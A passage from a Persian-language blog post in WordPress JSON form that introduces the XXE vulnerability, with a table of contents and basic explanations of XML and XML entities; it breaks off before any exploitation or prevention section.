{"id":11057,"date":"2021-05-19T18:01:26","date_gmt":"2021-05-19T13:31:26","guid":{"rendered":"https:\/\/liangroup.net\/blog\/?p=11057"},"modified":"2022-02-05T15:31:43","modified_gmt":"2022-02-05T12:01:43","slug":"what-is-xxe","status":"publish","type":"post","link":"https:\/\/liangroup.net\/blog\/what-is-xxe\/","title":{"rendered":"XML \u0686\u06cc\u0633\u062a \u0648 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc XXE \u0686\u06af\u0648\u0646\u0647 \u0628\u0647 \u0648\u062c\u0648\u062f \u0645\u06cc\u200c\u0622\u06cc\u062f\u061f"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-post\" data-elementor-id=\"11057\" class=\"elementor elementor-11057\" data-elementor-post-type=\"post\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-c3ede4b elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"c3ede4b\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-12c4052\" data-id=\"12c4052\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-de8e761 elementor-widget elementor-widget-text-editor\" data-id=\"de8e761\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>\u062f\u0631 \u0627\u06cc\u0646 \u0645\u0642\u0627\u0644\u0647 \u0645\u06cc\u200c\u062e\u0648\u0627\u0647\u06cc\u0645 \u0628\u0627 \u0645\u062b\u0627\u0644 \u0639\u0645\u0644\u06cc \u0648 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u06a9\u062f\u060c \u0628\u0627 <em><strong><a href=\"https:\/\/liangroup.net\/blog\/what-is-vulnerability\/\">\u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc<\/a> XXE<\/strong><\/em> \u0622\u0634\u0646\u0627 \u0634\u0648\u06cc\u0645. XXE \u06cc\u0627 XML External Entities\u060c \u062f\u0631 \u0644\u06cc\u0633\u062a <a href=\"https:\/\/academy.liangroup.net\/training-course\/owasp-web-application\"><strong>OWASP Top 10<\/strong><\/a> \u0628\u0631\u0627\u06cc \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627\u06cc \u0648\u0628\u060c \u062f\u0631 \u0631\u062a\u0628\u0647 \u0686\u0647\u0627\u0631\u0645 \u0642\u0631\u0627\u0631 \u062f\u0627\u0631\u062f \u0648 \u0628\u062e\u0634 \u0645\u0647\u0645\u06cc \u0627\u0632 \u062d\u0645\u0644\u0627\u062a \u0648\u0628\u060c \u062d\u0645\u0644\u0627\u062a \u062a\u0632\u0631\u06cc\u0642 XXE \u0647\u0633\u062a\u0646\u062f. \u0627\u0645\u0627 \u0628\u0631\u0627\u06cc \u0627\u06cc\u0646 \u06a9\u0647 \u0628\u0647\u062a\u0631 \u0628\u062a\u0648\u0627\u0646\u06cc\u0645 \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0631\u0627 \u062f\u0631\u06a9 \u06a9\u0646\u06cc\u0645\u060c \u0627\u0628\u062a\u062f\u0627 \u0628\u0627\u06cc\u062f \u0622\u0634\u0646\u0627\u06cc\u06cc \u0645\u062e\u062a\u0635\u0631\u06cc \u0628\u0627 \u0641\u0627\u06cc\u0644\u200c\u0647\u0627\u06cc XML \u062f\u0627\u0634\u062a\u0647 \u0628\u0627\u0634\u06cc\u0645 \u0648 \u0628\u0647 \u0627\u06cc\u0646 \u0633\u0648\u0627\u0644\u0627\u062a \u067e\u0627\u0633\u062e \u062f\u0647\u06cc\u0645:<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-20d8b5d elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"20d8b5d\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-80278cf\" data-id=\"80278cf\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-ec5b969 elementor-widget elementor-widget-text-editor\" data-id=\"ec5b969\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<span style=\"font-size: 11pt; color: #000000;\"><strong>XML \u0686\u06cc\u0633\u062a\u061f XML Entity \u0686\u06cc\u0633\u062a\u061f DTD \u0686\u06cc\u0633\u062a\u061f Custom Entity \u0686\u06cc\u0633\u062a\u061f External Entity \u0686\u06cc\u0633\u062a\u061f<\/strong><\/span>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-93dd0f0 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"93dd0f0\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-11749e1\" data-id=\"11749e1\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-5a3fa3b elementor-widget elementor-widget-text-editor\" data-id=\"5a3fa3b\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>\u062f\u0631 \u0627\u062f\u0627\u0645\u0647\u060c \u0627\u0628\u062a\u062f\u0627 \u0628\u0627 \u0627\u06cc\u0646 \u0645\u0641\u0627\u0647\u06cc\u0645 \u0622\u0634\u0646\u0627 \u0645\u06cc\u200c\u0634\u0648\u06cc\u0645 \u0648 \u0633\u067e\u0633 \u062a\u0648\u0636\u06cc\u062d \u0645\u06cc\u200c\u062f\u0647\u06cc\u0645 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc <strong>XXE \u0686\u06cc\u0633\u062a<\/strong>\u060c \u0686\u0637\u0648\u0631 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 <strong>\u062d\u0645\u0644\u0647 XXE Injection<\/strong> \u0627\u0646\u062c\u0627\u0645 \u062f\u0627\u062f \u0648 \u0686\u06af\u0648\u0646\u0647 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u0627\u0632 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc XXE \u062c\u0644\u0648\u06af\u06cc\u0631\u06cc \u06a9\u0631\u062f. \u062f\u0631 \u0636\u0645\u0646 \u0627\u06af\u0631 \u0628\u0627 \u0645\u0641\u0627\u0647\u06cc\u0645 \u0628\u0627\u0644\u0627 \u0622\u0634\u0646\u0627\u06cc\u06cc \u062f\u0627\u0631\u06cc\u062f\u060c \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u062f \u0627\u0632 \u0622\u0646\u200c\u0647\u0627 \u0639\u0628\u0648\u0631 \u06a9\u0646\u06cc\u062f.<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-4e57738 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"4e57738\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-a7b4729\" data-id=\"a7b4729\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-cf69484 elementor-widget elementor-widget-text-editor\" data-id=\"cf69484\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<ul><li><a href=\"#xml-entities\"><strong>\u0628\u062e\u0634 \u0627\u0648\u0644: <\/strong><strong>XML Entities<\/strong><\/a><ul><li><a href=\"#whats-xml\"><strong>XML<\/strong><strong> \u0686\u06cc\u0633\u062a\u061f<\/strong><\/a><\/li><li><a href=\"#entity-in-xml\"><strong>Entity<\/strong><strong> \u062f\u0631 <\/strong><strong>XML<\/strong><strong> \u0628\u0647 \u0686\u0647 \u0645\u0639\u0646\u0627\u0633\u062a\u061f<\/strong><\/a><\/li><li><a href=\"#dtd\"><strong>DTD<\/strong><strong> \u06cc\u0627 \u062a\u0639\u0631\u06cc\u0641 \u0646\u0648\u0639 \u0633\u0646\u062f \u0628\u0647 \u0686\u0647 \u0686\u06cc\u0632\u06cc \u06af\u0641\u062a\u0647 \u0645\u06cc\u200c\u0634\u0648\u062f\u061f<\/strong><\/a><\/li><li><a href=\"#custom-entity\"><strong>\u0627\u0646\u062a\u06cc\u062a\u06cc \u0634\u062e\u0635\u06cc\u200c\u0633\u0627\u0632\u06cc \u0634\u062f\u0647 (<\/strong><strong>Custom Entity<\/strong><strong>) \u0686\u06cc\u0633\u062a \u0648 \u0686\u06af\u0648\u0646\u0647 \u062a\u0639\u0631\u06cc\u0641 \u0645\u06cc\u200c\u0634\u0648\u062f\u061f<\/strong><\/a><\/li><li><a href=\"#ext-entity\"><strong>External Entity<\/strong><strong> \u06cc\u0627 \u0627\u0646\u062a\u06cc\u062a\u06cc \u062e\u0627\u0631\u062c\u06cc \u0686\u06cc\u0633\u062a\u061f<\/strong><\/a><\/li><\/ul><\/li><li><a href=\"#ext-entity-injection\"><strong>\u0628\u062e\u0634 \u062f\u0648\u0645: <\/strong><strong>XXE Injection<\/strong><strong> \u06cc\u0627 \u062a\u0632\u0631\u06cc\u0642 \u0627\u0646\u062a\u06cc\u062a\u06cc\u200c\u0647\u0627\u06cc \u062e\u0627\u0631\u062c\u06cc<\/strong><\/a><ul><li><a href=\"#xxe-injection\"><strong>\u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u062a\u0632\u0631\u06cc\u0642 <\/strong><strong>XXE<\/strong><strong> \u0686\u06cc\u0633\u062a\u061f<\/strong><\/a><\/li><li><a href=\"#occurance\"><strong>\u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc <\/strong><strong>XXE<\/strong><strong> \u0686\u06af\u0648\u0646\u0647 \u0628\u0647 \u0648\u062c\u0648\u062f \u0645\u06cc\u200c\u0622\u06cc\u062f\u061f<\/strong><\/a><\/li><li><a href=\"#types\"><strong>\u0627\u0646\u0648\u0627\u0639 \u062d\u0645\u0644\u0627\u062a <\/strong><strong>XXE<\/strong><strong> \u06a9\u062f\u0627\u0645\u0646\u062f\u061f<\/strong><\/a><ul><li><a href=\"#file-retrieval\"><strong>\u0627\u06a9\u0633\u067e\u0644\u0648\u06cc\u062a <\/strong><strong>XXE<\/strong><strong> \u0628\u0631\u0627\u06cc \u062f\u0633\u062a\u06cc\u0627\u0628\u06cc \u0628\u0647 \u0641\u0627\u06cc\u0644\u200c\u0647\u0627<\/strong><\/a><\/li><li><a href=\"#ssrf\"><strong>\u0627\u06a9\u0633\u067e\u0644\u0648\u06cc\u062a <\/strong><strong>XXE<\/strong><strong> \u0628\u0631\u0627\u06cc \u0627\u0646\u062c\u0627\u0645 \u062d\u0645\u0644\u0647 <\/strong><strong>SSRF<\/strong><\/a><\/li><\/ul><\/li><li><a href=\"#blind-xxe\"><strong>\u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc <\/strong><strong>Blind XXE<\/strong><\/a><ul><li><a href=\"#whats-blind-xxe\"><strong>\u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc <\/strong><strong>Blind XXE<\/strong><strong> \u0686\u06cc\u0633\u062a\u061f<\/strong><\/a><\/li><li><a href=\"#oast\"><strong>\u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc <\/strong><strong>Blind XXE<\/strong><strong> \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u062a\u06a9\u0646\u06cc\u06a9\u200c\u0647\u0627\u06cc <\/strong><strong>OAST<\/strong><strong> (\u06cc\u0627 <\/strong><strong>out-of-band<\/strong><strong>)<\/strong><\/a><ul><li><a href=\"#oast-file-retrieval\"><strong>\u0627\u06a9\u0633\u067e\u0644\u0648\u06cc\u062a <\/strong><strong>Blind XXE<\/strong><strong> \u0628\u0631\u0627\u06cc \u0627\u0633\u062a\u062e\u0631\u0627\u062c \u062f\u0627\u062f\u0647 \u0628\u0647 \u0635\u0648\u0631\u062a <\/strong><strong>out-of-band<\/strong><\/a><\/li><li><a href=\"#err-msg\"><strong>\u0627\u06a9\u0633\u067e\u0644\u0648\u06cc\u062a <\/strong><strong>Blind XXE<\/strong><strong> \u0628\u0631\u0627\u06cc \u062f\u0633\u062a\u06cc\u0627\u0628\u06cc \u0628\u0647 \u062f\u0627\u062f\u0647\u200c\u0647\u0627 \u0627\u0632 \u0637\u0631\u06cc\u0642 \u067e\u06cc\u0627\u0645\u200c\u0647\u0627\u06cc \u062e\u0637\u0627<\/strong><\/a><\/li><li><a href=\"#local-dtd\"><strong>\u0627\u06a9\u0633\u067e\u0644\u0648\u06cc\u062a <\/strong><strong>Blind XXE<\/strong><strong> \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u063a\u06cc\u0631 \u0645\u0633\u062a\u0642\u06cc\u0645 \u0627\u0632 \u06cc\u06a9 <\/strong><strong>DTD<\/strong><strong> \u0645\u062d\u0644\u06cc<\/strong><\/a><ul><li><a href=\"#find-local-dtd\"><strong>\u06cc\u0627\u0641\u062a\u0646 \u06cc\u06a9 \u0641\u0627\u06cc\u0644 <\/strong><strong>DTD<\/strong><strong> \u0645\u0648\u062c\u0648\u062f \u0628\u0631\u0627\u06cc \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u063a\u06cc\u0631 \u0645\u0633\u062a\u0642\u06cc\u0645<\/strong><\/a><\/li><\/ul><\/li><\/ul><\/li><li><a href=\"#attack-surface\"><strong>\u0646\u062d\u0648\u0647 \u06cc\u0627\u0641\u062a\u0646 \u062f\u0627\u0631\u0627\u06cc\u06cc\u200c\u0647\u0627\u06cc \u0645\u0633\u062a\u0639\u062f \u062a\u0632\u0631\u06cc\u0642 <\/strong><strong>XXE<\/strong><\/a><ul><li><a href=\"#xinclude\"><strong>\u062d\u0645\u0644\u0627\u062a <\/strong><strong>XInclude<\/strong><\/a><\/li><li><a href=\"#file-upload\"><strong>\u062d\u0645\u0644\u0627\u062a <\/strong><strong>XXE<\/strong><strong> \u0627\u0632 \u0637\u0631\u06cc\u0642 \u0622\u067e\u0644\u0648\u062f \u0641\u0627\u06cc\u0644<\/strong><\/a><\/li><li><a href=\"#content-format\"><strong>\u062d\u0645\u0644\u0627\u062a <\/strong><strong>XXE<\/strong><strong> \u0627\u0632 \u0637\u0631\u06cc\u0642 \u062a\u063a\u06cc\u06cc\u0631 \u0646\u0648\u0639 \u0645\u062d\u062a\u0648\u0627<\/strong><\/a><\/li><\/ul><\/li><\/ul><\/li><li><a href=\"#find-xxes\"><strong>\u0686\u06af\u0648\u0646\u0647 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627\u06cc <\/strong><strong>XXE<\/strong><strong> \u0631\u0627 \u0628\u06cc\u0627\u0628\u06cc\u0645\u061f (\u062a\u0633\u062a \u0648\u062c\u0648\u062f <\/strong><strong>XXE<\/strong><strong>)<\/strong><\/a><\/li><li><a href=\"#prevent-xxes\"><strong>\u0686\u06af\u0648\u0646\u0647 \u0627\u0632 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc <\/strong><strong>XXE<\/strong><strong> \u062c\u0644\u0648\u06af\u06cc\u0631\u06cc \u06a9\u0646\u06cc\u0645\u061f<\/strong><\/a><\/li><\/ul><\/li><\/ul>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-8cc3b64 elementor-widget elementor-widget-html\" data-id=\"8cc3b64\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"html.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<div id=\"1793944692\"><script type=\"text\/JavaScript\" src=\"https:\/\/www.aparat.com\/embed\/fqpdF?data[rnddiv]=1793944692&data[responsive]=yes&data[title]=%D9%88%D8%A8%DB%8C%D9%86%D8%A7%D8%B1%20%D8%AD%D9%85%D9%84%D8%A7%D8%AA%20XXE%20%D8%A7%D8%B2%20%DA%A9%D9%88%D8%B4%D8%A7%20%D8%B2%D9%86%D8%AC%D8%A7%D9%86%DB%8C&&recom=none\"><\/script><\/div>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-ac4db64 elementor-section-content-middle elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"ac4db64\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-ca26801\" data-id=\"ca26801\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-0289992 elementor-widget elementor-widget-text-editor\" data-id=\"0289992\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<h2 id=\"xml-entities\">XML Entities<\/h2>\n\u0627\u0632 \u0622\u0646\u200c\u062c\u0627\u06cc\u06cc \u06a9\u0647 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc XXE \u0648 \u062d\u0645\u0644\u0627\u062a \u0627\u0646\u062c\u0627\u0645\u200c\u0634\u062f\u0647 \u0628\u0627 \u0627\u06a9\u0633\u067e\u0644\u0648\u06cc\u062a \u0622\u0646 \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0627\u0646\u062a\u06cc\u062a\u06cc\u200c\u0647\u0627\u06cc XML \u0627\u0646\u062c\u0627\u0645 \u0645\u06cc\u200c\u0634\u0648\u0646\u062f\u060c \u0627\u0628\u062a\u062f\u0627 \u0628\u0627\u06cc\u062f \u0628\u062f\u0627\u0646\u06cc\u0645 \u0627\u06cc\u0646 \u0627\u0646\u062a\u06cc\u062a\u06cc\u200c\u0647\u0627 \u0686\u0647 \u0647\u0633\u062a\u0646\u062f\u061b \u062f\u0631 \u0628\u062e\u0634\u200c\u0647\u0627\u06cc \u0628\u0639\u062f\u06cc \u0628\u0647 \u0637\u0648\u0631 \u0645\u0641\u0635\u0644 \u062a\u0648\u0636\u06cc\u062d \u062f\u0627\u062f\u0647\u200c\u0627\u06cc\u0645 XML Entity \u0686\u06cc\u0633\u062a.\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-7b11303\" data-id=\"7b11303\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-e8e3f6b elementor-widget elementor-widget-image\" data-id=\"e8e3f6b\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2021\/05\/xml-min-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail wp-image-11099\" alt=\"xml \u0686\u06cc\u0633\u062a\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2021\/05\/xml-min-150x150.jpg 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2021\/05\/xml-min-300x300.jpg 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2021\/05\/xml-min.jpg 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-adc81b2 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"adc81b2\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-b33870f\" data-id=\"b33870f\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-fc08f3c elementor-widget elementor-widget-text-editor\" data-id=\"fc08f3c\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<h2 id=\"whats-xml\">XML \u0686\u06cc\u0633\u062a\u061f<\/h2>\nXML \u0645\u062e\u0641\u0641 \u00ab Extensible Markup Language\u00bb\u060c \u0648 \u0647\u0645\u0627\u0646\u200c\u0637\u0648\u0631 \u06a9\u0647 \u062f\u0631 \u0646\u0627\u0645 \u0622\u0646 \u0622\u0645\u062f\u0647\u060c \u06cc\u06a9\u06cc \u0627\u0632 \u0632\u0628\u0627\u0646\u200c\u0647\u0627\u06cc \u0645\u0627\u0631\u06a9\u200c\u0622\u067e \u0645\u0627\u0646\u0646\u062f HTML \u0627\u0633\u062a. \u0632\u0628\u0627\u0646 XML \u0628\u0627 \u0647\u062f\u0641 \u0630\u062e\u06cc\u0631\u0647\u200c\u0633\u0627\u0632\u06cc \u0648 \u0627\u0646\u062a\u0642\u0627\u0644 \u062f\u0627\u062f\u0647 \u0637\u0631\u0627\u062d\u06cc \u0634\u062f\u0647 \u0627\u0633\u062a (\u0628\u0631 \u062e\u0644\u0627\u0641 HTML \u06a9\u0647 \u0628\u0631\u0627\u06cc \u0646\u0645\u0627\u06cc\u0634 \u062f\u0627\u062f\u0647 \u0637\u0631\u0627\u062d\u06cc \u0634\u062f\u0647). \u0645\u0627\u0646\u0646\u062f HTML\u060c \u0632\u0628\u0627\u0646 XML \u0646\u06cc\u0632 \u0627\u0632 \u06cc\u06a9 \u0633\u0627\u062e\u062a\u0627\u0631 \u062f\u0631\u062e\u062a\u06cc \u062a\u0634\u06a9\u06cc\u0644\u200c\u0634\u062f\u0647 \u0627\u0632 \u062a\u06af\u200c\u0647\u0627\u06cc \u0645\u062e\u062a\u0644\u0641 \u0648 \u062f\u0627\u062f\u0647 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u06a9\u0646\u062f. \u06cc\u06a9\u06cc \u0627\u0632 \u062a\u0641\u0627\u0648\u062a\u200c\u0647\u0627\u06cc \u0639\u0645\u062f\u0647\u200c\u06cc XML \u0628\u0627 HTML\u060c \u0627\u06cc\u0646 \u0627\u0633\u062a \u06a9\u0647 \u0632\u0628\u0627\u0646 XML \u0627\u0632 \u062a\u06af\u200c\u0647\u0627\u06cc \u0627\u0632 \u067e\u06cc\u0634 \u062a\u0639\u0631\u06cc\u0641\u200c\u0634\u062f\u0647 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0646\u0645\u06cc\u200c\u06a9\u0646\u062f\u060c \u0648 \u0628\u0647 \u0647\u0645\u06cc\u0646 \u062e\u0627\u0637\u0631 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u062f\u0631 \u0627\u06cc\u0646 \u0632\u0628\u0627\u0646 \u0628\u0647 \u062a\u06af\u200c\u0647\u0627 \u0646\u0627\u0645\u200c\u0647\u0627\u06cc\u06cc \u062f\u0627\u062f \u06a9\u0647 \u0646\u0634\u0627\u0646\u200c\u062f\u0647\u0646\u062f\u0647\u200c\u06cc \u062f\u0627\u062f\u0647\u200c\u0627\u06cc \u0628\u0627\u0634\u0646\u062f \u06a9\u0647 \u062f\u0631 \u0647\u0631 \u062a\u06af \u0630\u062e\u06cc\u0631\u0647 \u0634\u062f\u0647 \u0627\u0633\u062a. \u0627\u0648\u0627\u06cc\u0644 \u067e\u06cc\u062f\u0627\u06cc\u0634 \u0648\u0628\u060c XML \u0628\u0647 \u0639\u0646\u0648\u0627\u0646 \u06cc\u06a9 \u0642\u0627\u0644\u0628 \u0627\u0646\u062a\u0642\u0627\u0644 \u062f\u0627\u062f\u0647 \u062e\u06cc\u0644\u06cc \u067e\u0631\u0637\u0631\u0641\u062f\u0627\u0631 \u0628\u0648\u062f (X \u062f\u0631 AJAX\u060c \u062d\u0631\u0641 \u0627\u0648\u0644 XML \u0627\u0633\u062a). \u0648\u0644\u06cc \u0642\u0627\u0644\u0628 JSON \u0628\u0647 \u062a\u062f\u0631\u06cc\u062c \u0645\u062d\u0628\u0648\u0628\u06cc\u062a \u0622\u0646 \u0631\u0627 \u0627\u0632 \u0622\u0646 \u062e\u0648\u062f \u06a9\u0631\u062f\u0647 \u0627\u0633\u062a.\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-97a63e5 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"97a63e5\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-d487a48\" data-id=\"d487a48\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-67285c4 elementor-widget elementor-widget-text-editor\" data-id=\"67285c4\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<h3 id=\"entity-in-xml\"><span style=\"font-size: 14pt;\">Entity \u062f\u0631 XML \u0628\u0647 \u0686\u0647 \u0645\u0639\u0646\u0627\u0633\u062a\u061f<\/span><\/h3>\n\u0627\u0646\u062a\u06cc\u062a\u06cc\u200c\u0647\u0627\u06cc XML \u0628\u0647 \u0645\u0627 \u0627\u062c\u0627\u0632\u0647 \u0645\u06cc\u200c\u062f\u0647\u0646\u062f \u0628\u0647 \u062c\u0627\u06cc \u0627\u06cc\u0646 \u06a9\u0647 \u0627\u0632 \u062e\u0648\u062f \u062f\u0627\u062f\u0647 \u062f\u0631 \u0633\u0646\u062f XML \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u06cc\u0645\u060c \u0622\u0646 \u0631\u0627 \u0628\u0627 \u06cc\u06a9 \u0622\u06cc\u062a\u0645 \u062f\u06cc\u06af\u0631 \u0646\u0634\u0627\u0646 \u062f\u0647\u06cc\u0645. \u062e\u0648\u062f XML \u0646\u06cc\u0632 \u062f\u0631 \u062a\u0639\u0631\u06cc\u0641 \u062e\u0648\u062f \u0686\u0646\u062f Entity \u0645\u062e\u062a\u0644\u0641 \u062f\u0627\u0631\u062f. \u0628\u0631\u0627\u06cc \u0645\u062b\u0627\u0644\u060c \u0627\u0646\u062a\u06cc\u062a\u06cc\u200c\u0647\u0627\u06cc &lt; \u0648 &gt; \u0646\u0634\u0627\u0646\u200c\u062f\u0647\u0646\u062f\u0647 \u0639\u0644\u0627\u0645\u062a\u200c\u0647\u0627\u06cc &lt; \u0648 &gt; \u0647\u0633\u062a\u0646\u062f. \u0627\u06cc\u0646 \u06a9\u0627\u0631\u0627\u06a9\u062a\u0631\u0647\u0627 